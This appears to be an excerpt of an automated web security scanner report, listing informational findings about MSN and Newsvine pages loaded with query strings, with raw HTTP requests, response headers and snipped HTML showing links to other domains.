<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://guylittle-1.newsvine.com/">GuyLittle</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fredevil.newsvine.com/">Fred Evil</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mjweir.newsvine.com/">mj-1451595</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://stretch291.newsvine.com/">stretch291</a>
...[SNIP]...
<div class="normal"><a href="http://ideaguy2.newsvine.com/">Idea Guy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://derek-brockman.newsvine.com/">Derek-908696</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://jstoler4156.newsvine.com/">jan-315534</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://littleadv.newsvine.com/">littleadv</a>
...[SNIP]...
<p><a href="http://bit.ly/gFYrpS">http://bit.ly/gFYrpS</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://cathy15.newsvine.com/">Woodyspond</a>
...[SNIP]...
<div class="normal"><a href="http://DMC2990950.newsvine.com/">DMC-2990950</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://JimHenigman.newsvine.com/">Jim Henigman</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Zarkon.newsvine.com/">Steve-1309027</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star21" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Haste502.newsvine.com/">Haste502</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BillMarvell.newsvine.com/">Bill Marvell</a>
...[SNIP]...
<div class="normal"><a href="http://add42162.newsvine.com/">Tony-353256</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://TWL.newsvine.com/">Azrancher</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
<div class="normal"><a href="http://msk2877762.newsvine.com/">msk-2877762</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://bertfw.newsvine.com/">Bertfw</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://benlam1.newsvine.com/">JobSeeker</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star22" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeBrooks.newsvine.com/">Mike Brooks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://johnthefree.newsvine.com/">jed233</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n-wentworth.newsvine.com/">Rubytuesday57</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://roger-4.newsvine.com/">Roger Walsh-477587</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="normal"><a href="http://jerry194283.newsvine.com/">jerry194283</a>
...[SNIP]...
<div class="normal"><a href="http://basedrum777.newsvine.com/">basedrum777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://TrudyP.newsvine.com/">Trudy P</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://settersperch.newsvine.com/">settersperch</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://yankinyerchain.newsvine.com/">yankinyerchain</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jpcyphers.newsvine.com/">Cyphers</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
<div class="avatar"><a href="http://allison-linnmsnbc.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/allison-linnmsnbc-846208182.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://www.evetahmincioglu.com/web/blog/">Career Diva</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/money/">Consumer Reports Money</a>
...[SNIP]...
<li><a href="http://norris.blogs.nytimes.com/">Floyd Norris</a>
...[SNIP]...
<li><a href="http://www.ritholtz.com/blog/">The Big Picture</a>
...[SNIP]...
<li><a href="http://consumerist.com/">The Consumerist</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/juggle/">The Juggle</a>
...[SNIP]...
<li><a href="http://www.suddenlyfrugal.com/">Suddenly Frugal</a>
...[SNIP]...
<li><a href="http://blogs.consumerreports.org/baby/">Consumer Reports Baby & Kids</a>
...[SNIP]...
<li><a href="http://www.economist.com/blogs/freeexchange">The Economist Free Exchange</a>
...[SNIP]...
<li><a href="http://bucks.blogs.nytimes.com/">Bucks</a></li><li><a href="http://blog.penelopetrunk.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://onthejob.45things.com/">On the Job</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo">Want more Life Inc.? Follow me on <a href="http://twitter.com/alinnmsnbc">Twitter</a>, check us out on <a href="http://www.facebook.com/home.php?#!/pages/Life-Inc/135937546449321?ref=ts">Facebook</a>
...[SNIP]...
<li><a href="http://moms.today.com/">TODAY Moms</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted">msnbc.com</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32027560">About us</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/32359544/">Contact</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303511/">Help</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/html/HtmlSitemap0.html">Site map</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/27365695/">Careers</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/3303540/">Terms &amp; Conditions</a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
<li>
                   <a href="http://www.msnbc.redacted/id/26613008/">Advertise</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.102. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a96db369e9e04f58943dfadec392ad8b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B11FFD8B6C574D6183561463F05E137F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 41515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344841&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamourmag.com/?mbid=msn"><img src="http://blstb.redacted/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn">10 Things He's Thinking When You're Naked</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn">15 Things Men Don't Want You to Know About Them</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn">7 Ways to Convince Any Man You're Right</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn">His Top 10 Sex Wishes Revealed</a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn">12 Secret Signs He's Into You</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;imageindex=1&amp;OCID=TWT">Tweet</a>
...[SNIP]...
');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;gt1=32092&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ref="http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&amp;gt1=32092&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&amp;cds_mag_code=GLM&amp;id=1212175010742&amp;lsid=81511416507026799&amp;vid=1&amp;cds_response_key=M8ELRMSNZ&amp;cds_mag_code=GLM"><img src="http://blstb.redacted/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.103. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /relationships/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /relationships/staticslideshowglamour.aspx?cp-documentid=17423139&gt1=32092 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:03 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=dcd4d603a2e341fc9f7c96dced229804; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7448EED9B6E045FB8CA4713347B1BD67; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:03 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 41449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406203&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
